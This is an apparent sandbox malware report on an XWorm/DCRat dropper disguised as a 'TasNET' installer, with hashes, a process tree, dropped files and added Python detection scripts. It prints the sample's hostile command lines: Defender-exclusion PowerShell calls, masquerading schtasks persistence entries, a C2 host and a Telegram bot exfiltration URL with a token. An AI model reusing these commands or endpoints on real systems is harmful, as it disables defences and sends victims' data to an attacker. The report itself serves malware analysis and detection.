Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-11-2024 12:53

General

  • Target

    TasNET 6.4.2.exe

  • Size

    11.0MB

  • MD5

    98680a096ea18299b58b5edc02c32fe3

  • SHA1

    16a15c4d9cd2d0b06d5a562652674015984a4069

  • SHA256

    31cadbe69cb9aa413846173101ab221115ca248d2154343fe27ecb2190597134

  • SHA512

    712e55650066520045fff13ad0326d871a7d4bc6c68c7e6ee0174259fa7a357ce93bdafb18cfbb682fbd2c0f1d28cdeed883c5c729238576210715b6f4d17e30

  • SSDEEP

    196608:PpBZ9P7gzj9Pjnt8unJQfPngNQJdVilMG9/bpsBJKtJF1yP3hYjsB:fZlcNCunmf4NUE/tYK1yvU

Malware Config

Extracted

Family

xworm

C2

why-wheel.gl.at.ply.gg:49900

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

  • telegram

    https://api.telegram.org/bot7921366915:AAEY2hsLmS8SLDWCoThahhj-qRzVY87NnlQ/sendMessage?chat_id=7110244770
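
The extracted config gives the two network indicators for this sample: the C2 endpoint on a playit.gg tunnel hostname (the "legitimate hosting services abused" signature) and a Telegram Bot API URL used to notify the operator of new infections. The following is an added example, not part of the sandbox report, that turns them into checks over network-connection events; the event shape, the tunnel suffix list and the list of processes for which Bot API traffic is expected are assumptions. The Telegram check is deliberately broader than the one bot token: any Bot API call from a process that is not a browser or messaging client is flagged, with the bot and chat ids parsed out for pivoting.

```python
"""Network-telemetry checks derived from the extracted XWorm config.

Added example; not part of the sandbox report. Event shape, tunnel suffixes
and the expected-client list are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Values taken from the extracted config above.
C2_HOST, C2_PORT = "why-wheel.gl.at.ply.gg", 49900
TELEGRAM_EXFIL_URL = ("https://api.telegram.org/bot7921366915:AAEY2hsLmS8SLDWCoThahhj-qRzVY87NnlQ"
                      "/sendMessage?chat_id=7110244770")
# Hostname suffixes of tunnelling services that hand out public endpoints
# (assumption: only the playit.gg suffix used by this sample is listed).
TUNNEL_SUFFIXES = (".ply.gg",)
# Processes for which Bot API traffic is plausible (assumption).
EXPECTED_TELEGRAM_CLIENTS = {"telegram.exe", "chrome.exe", "firefox.exe", "msedge.exe"}

BOT_PATH_RE = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>\w+)$")


def parse_telegram_bot_url(url: str) -> Optional[Dict[str, Optional[str]]]:
    """Split a Bot API URL into bot id, method and chat_id; None if it is not one."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        return None
    chat_id = parse_qs(parts.query).get("chat_id", [None])[0]
    return {"bot_id": m["bot_id"], "method": m["method"], "chat_id": chat_id}


@dataclass(frozen=True)
class NetEvent:
    image: str                 # full path of the process that opened the connection
    dest_host: str
    dest_port: int
    url: Optional[str] = None  # HTTP(S) URL when a proxy saw one


def analyze(event: NetEvent) -> List[str]:
    """Return the detection labels that fire for one connection event."""
    findings: List[str] = []
    host = event.dest_host.lower()
    if host == C2_HOST and event.dest_port == C2_PORT:
        findings.append("known_xworm_c2")
    if host.endswith(TUNNEL_SUFFIXES):
        findings.append("tunnel_service_endpoint")
    if event.url:
        bot = parse_telegram_bot_url(event.url)
        process_name = event.image.rsplit("\\", 1)[-1].lower()
        if bot and process_name not in EXPECTED_TELEGRAM_CLIENTS:
            findings.append(
                f"telegram_bot_beacon:bot={bot['bot_id']},chat={bot['chat_id']},method={bot['method']}")
    return findings


def triage(events: List[NetEvent]) -> Dict[int, List[str]]:
    """Map event index -> findings for every event that triggered a check."""
    results: Dict[int, List[str]] = {}
    for index, event in enumerate(events):
        findings = analyze(event)
        if findings:
            results[index] = findings
    return results


# Constructed events, modelled on what this sample's install copy would produce.
SAMPLE_EVENTS = [
    NetEvent(r"C:\Users\Admin\AppData\Roaming\svchost.exe", "why-wheel.gl.at.ply.gg", 49900),
    NetEvent(r"C:\Users\Admin\AppData\Roaming\svchost.exe", "api.telegram.org", 443, TELEGRAM_EXFIL_URL),
    # Benign: a browser talking to the Bot API, and ordinary HTTPS traffic.
    NetEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", "api.telegram.org", 443,
             "https://api.telegram.org/bot123456:ABCdef/getMe"),
    NetEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "www.example.com", 443,
             "https://www.example.com/"),
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index].dest_host, findings)
```

Only the first two constructed events fire: the raw connection to the tunnel host (matched both as the known C2 and generically as a tunnel-service endpoint) and the Bot API call from the AppData copy of svchost.exe. Matching on the tunnel suffix rather than the full hostname is the part that survives a config change by the operator.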

Signatures

  • DcRat

    DarkCrystal (DCRat) is a .NET remote access trojan, active since June 2019, capable of loading additional plugins.

  • Dcrat family
  • Detect Xworm Payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 13 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\TasNET 6.4.2.exe
    "C:\Users\Admin\AppData\Local\Temp\TasNET 6.4.2.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Users\Admin\AppData\Roaming\TasNET Service.exe
      "C:\Users\Admin\AppData\Roaming\TasNET Service.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:488
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\TasNET Service.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'TasNET Service.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1432
      • C:\Users\Admin\AppData\Local\Temp\G87J6557GFNCY9L.exe
        "C:\Users\Admin\AppData\Local\Temp\G87J6557GFNCY9L.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2148
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2316
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1004
            • C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
              "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
              6⤵
              • Modifies WinLogon for persistence
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2888
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1tfhpkhi\1tfhpkhi.cmdline"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1092
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B69.tmp" "c:\Users\Admin\AppData\Roaming\CSC79DF5490896B4860845ED9159EF1E24.TMP"
                  8⤵
                    PID:2556
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0mzguz0\x0mzguz0.cmdline"
                  7⤵
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:2604
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BD6.tmp" "c:\Windows\System32\CSC7ECC981844524103993796C0B2F1D7E.TMP"
                    8⤵
                      PID:1508
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\sppsvc.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1704
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\TasNET Service.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2388
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1516
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2484
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1380
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2232
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2OzDmfDsvs.bat"
                    7⤵
                      PID:2164
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        8⤵
                          PID:632
                        • C:\Windows\system32\PING.EXE
                          ping -n 10 localhost
                          8⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Runs ping.exe
                          PID:1484
                        • C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe
                          "C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe"
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1996
    • C:\Users\Admin\AppData\Local\Temp\TASNet-6.4.2-win64.exe
      "C:\Users\Admin\AppData\Local\Temp\TASNet-6.4.2-win64.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2828
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDD45.tmp.bat""
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:2716
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:2992
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1708
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3068
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1700
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TasNET ServiceT" /sc MINUTE /mo 7 /tr "'C:\HypercomponentCommon\TasNET Service.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1804
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TasNET Service" /sc ONLOGON /tr "'C:\HypercomponentCommon\TasNET Service.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2208
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TasNET ServiceT" /sc MINUTE /mo 10 /tr "'C:\HypercomponentCommon\TasNET Service.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3048
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1860
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2800
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\Office14\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:952
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1864
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1676
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:288
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2876
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2788
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:896
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 14 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1644
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1336
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 9 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2092
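
The process tree above contains the three behaviours that matter for detection: Defender exclusions added through Add-MpPreference, scheduled tasks created with /rl HIGHEST and minute-level triggers that point at copies of the payload named after Windows system binaries (sppsvc.exe, spoolsv.exe, conhost.exe, services.exe) in non-system directories, and the ping/timeout sleeps in the dropped batch files. The following is an added example, not part of the sandbox report or of any tool it names, that runs those checks over process-creation events; the event shape, the extended list of system binary names, the parent process assigned to the schtasks events and the 15-minute trigger threshold are assumptions.

```python
"""Process-creation checks for the behaviours shown in the process tree.

Added example; not part of the sandbox report. The event shape, the extended
list of system binary names and the 15-minute trigger threshold are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Names the dropper in this report gives its copies (svchost, services, conhost,
# spoolsv, sppsvc), extended (assumption) with other names abused the same way.
SYSTEM_BINARY_NAMES = {
    "svchost.exe", "services.exe", "conhost.exe", "spoolsv.exe", "sppsvc.exe",
    "csrss.exe", "lsass.exe", "winlogon.exe", "dwm.exe", "explorer.exe",
}
# The only directories in which those names are expected to live.
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
MAX_BENIGN_MINUTE_INTERVAL = 15  # assumption: /sc MINUTE /mo <= 15 is a beacon-style trigger

EXCLUSION_RE = re.compile(
    r"""add-mppreference\s+-exclusion(?P<kind>path|process|extension)\s+['"]?(?P<value>[^'"]+)""",
    re.IGNORECASE)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.IGNORECASE)
TASK_TARGET_RE = re.compile(r"""/tr\s+["']*(?P<path>[^'"]+?)(?:['"]|\s+/|$)""", re.IGNORECASE)
TASK_SCHEDULE_RE = re.compile(r"/sc\s+(?P<sc>\w+)", re.IGNORECASE)
TASK_MODIFIER_RE = re.compile(r"/mo\s+(?P<mo>\d+)", re.IGNORECASE)
TASK_HIGHEST_RE = re.compile(r"/rl\s+highest\b", re.IGNORECASE)
# "ping -n N localhost" and "timeout N" are the sleep idioms used by the dropped .bat files.
DELAY_RE = re.compile(
    r"\bping(?:\.exe)?\s+-n\s+\d+\s+(?:localhost|127\.0\.0\.1)\b|\btimeout(?:\.exe)?\s+(?:/t\s+)?\d+\b",
    re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def masquerading_path(path: str) -> bool:
    """True when a system-binary name sits outside the Windows system directories."""
    p = path.strip().strip("'\"").lower()
    directory, _, name = p.rpartition("\\")
    return name in SYSTEM_BINARY_NAMES and directory not in SYSTEM_DIRS


def analyze(event: ProcessEvent) -> List[str]:
    """Return the detection labels that fire for one process-creation event."""
    findings: List[str] = []
    cmd = event.command_line
    for m in EXCLUSION_RE.finditer(cmd):
        findings.append(f"defender_exclusion:{m['kind'].lower()}:{m['value'].strip()}")
    if SCHTASKS_CREATE_RE.search(cmd):
        target = TASK_TARGET_RE.search(cmd)
        if target and masquerading_path(target["path"]):
            findings.append(f"task_masquerading_target:{target['path'].strip()}")
        if TASK_HIGHEST_RE.search(cmd):
            findings.append("task_runlevel_highest")
        sc, mo = TASK_SCHEDULE_RE.search(cmd), TASK_MODIFIER_RE.search(cmd)
        if sc and sc["sc"].upper() == "MINUTE" and mo and int(mo["mo"]) <= MAX_BENIGN_MINUTE_INTERVAL:
            findings.append(f"task_minute_interval:{mo['mo']}")
    if DELAY_RE.search(cmd) and event.parent_image.lower().endswith("\\cmd.exe"):
        findings.append("scripted_delay")
    if masquerading_path(event.image):
        findings.append(f"masquerading_image:{event.image}")
    return findings


def triage(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map PID -> findings for every event that triggered at least one check."""
    results: Dict[int, List[str]] = {}
    for event in events:
        findings = analyze(event)
        if findings:
            results[event.pid] = findings
    return results


CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
DROPPER = r"C:\Users\Admin\AppData\Roaming\TasNET Service.exe"
SERVICES_COPY = r"C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe"

# Constructed events, modelled on the command lines in the process tree above.
SAMPLE_EVENTS = [
    ProcessEvent(2424, DROPPER, PS,
                 r"powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\TasNET Service.exe'"),
    ProcessEvent(1708, CMD, SCHTASKS,
                 r"""schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /f"""),
    ProcessEvent(3068, CMD, SCHTASKS,
                 r"""schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f"""),
    ProcessEvent(1484, CMD, r"C:\Windows\System32\PING.EXE", "ping -n 10 localhost"),
    ProcessEvent(1996, CMD, SERVICES_COPY, f'"{SERVICES_COPY}"'),
    # Two benign events that must stay silent.
    ProcessEvent(4100, r"C:\Windows\explorer.exe", SCHTASKS,
                 r"""schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Windows\System32\wbadmin.exe start backup" /f"""),
    ProcessEvent(4101, r"C:\Windows\explorer.exe", PS, "powershell.exe Get-MpPreference"),
]

if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS).items():
        print(pid, findings)
```

The masquerading check is the one worth keeping on every host: a file named sppsvc.exe, spoolsv.exe, conhost.exe or services.exe that is not under C:\Windows is wrong regardless of how it got there, and it catches both the task target and the later execution of the copy (PID 1996 above). The exclusion and scheduled-task checks are noisier on administrator workstations and are better used as correlation with the first.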

            Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe

              Filesize

              220B

              MD5

              47085bdd4e3087465355c9bb9bbc6005

              SHA1

              bf0c5b11c20beca45cc9d4298f2a11a16c793a61

              SHA256

              80577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752

              SHA512

              e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684

            • C:\HypercomponentCommon\cemEzm0xYx1.bat

              Filesize

              105B

              MD5

              5ee2935a1949f69f67601f7375b3e8a3

              SHA1

              6a3229f18db384e57435bd3308298da56aa8c404

              SHA256

              c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06

              SHA512

              9777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              342B

              MD5

              beaa42ed76e144a8618092f5e25c7883

              SHA1

              66f9c39b86c173feb114dc44f909eaf045dad32b

              SHA256

              34b2b52f900bd3536543dbd055bb448abd83f0906a88276074c6c57ec9d32eb1

              SHA512

              866d25a3ebb4e6d0d51a3cab7c3b36d5fa461637a2eac0e476ca0949dd6c7cf1cbe6850fc911fbbf977c378b94b779315551cb03dd0d8b0785f18ad0a1a9b481

            • C:\Users\Admin\AppData\Local\Temp\2OzDmfDsvs.bat

              Filesize

              229B

              MD5

              b2bceafc9006a34f8a30e031945e471d

              SHA1

              bdf08103c7de9ad5ba344e6a753f4ea04a0e728f

              SHA256

              5b983bffc96c88b578595c7f70ce9cd03b974e1f594f30ea20a463852abcf4d8

              SHA512

              e66abb9bbf105477b0095983d3f6fdce958f7fc612e722f0f19006606427932c4a6eb03ac27a7a33014781608b3274ccfecf34d0afa5ab7eb72bd0c83011b0da

            • C:\Users\Admin\AppData\Local\Temp\CabDA4A.tmp

              Filesize

              70KB

              MD5

              49aebf8cbd62d92ac215b2923fb1b9f5

              SHA1

              1723be06719828dda65ad804298d0431f6aff976

              SHA256

              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

              SHA512

              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

            • C:\Users\Admin\AppData\Local\Temp\G87J6557GFNCY9L.exe

              Filesize

              2.2MB

              MD5

              05d87a4a162784fd5256f4118aff32af

              SHA1

              484ed03930ed6a60866b6f909b37ef0d852dbefd

              SHA256

              7e3d0dabaded78094abfac40d694eaebf861f3cb865d3835bb053d435e996950

              SHA512

              3d4ce511e9671d8bfa15e93d681fedd972f4fe4c09ac9cfd9653afe83e936654c88ee515a76e7ac80e8f34868802e68c6531fdea0b718029d2196ad1425981fc

            • C:\Users\Admin\AppData\Local\Temp\RES5B69.tmp

              Filesize

